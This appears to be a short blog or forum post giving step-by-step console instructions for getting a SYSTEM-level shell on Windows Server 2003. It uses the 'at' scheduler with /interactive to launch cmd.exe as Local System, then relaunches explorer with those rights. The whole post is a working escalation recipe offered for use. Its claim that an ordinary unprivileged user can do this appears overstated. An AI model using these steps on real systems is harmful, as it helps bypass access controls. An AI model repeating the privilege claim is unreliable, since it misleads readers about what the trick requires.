I have just uncovered a way to perform root priviledge escalation under Windows (tested using Server 2003 SP2)…so easy, with no addons or anything – all you need is a console.

1. Open up a command prompt (cmd.exe)
2. Type whoami. This should return your username – lowly peon user.
3. In the command prompt, enter the following: at <current time + 1 min> /interactive “cmd.exe”
   The point of this step is to set up a scheduled task to execute in one minute of the current time. This scheduled task will launch a command prompt under the credentials of Local System.
   For example: at 11:05 /interactive “cmd.exe” will launch the cmd window at 11:05am.
4. Type whoami into the new cmd window…..Voila!

Once escalated, you can use taskmgr to kill explorer and then re-run it from the new command prompt with the escalated priviledge.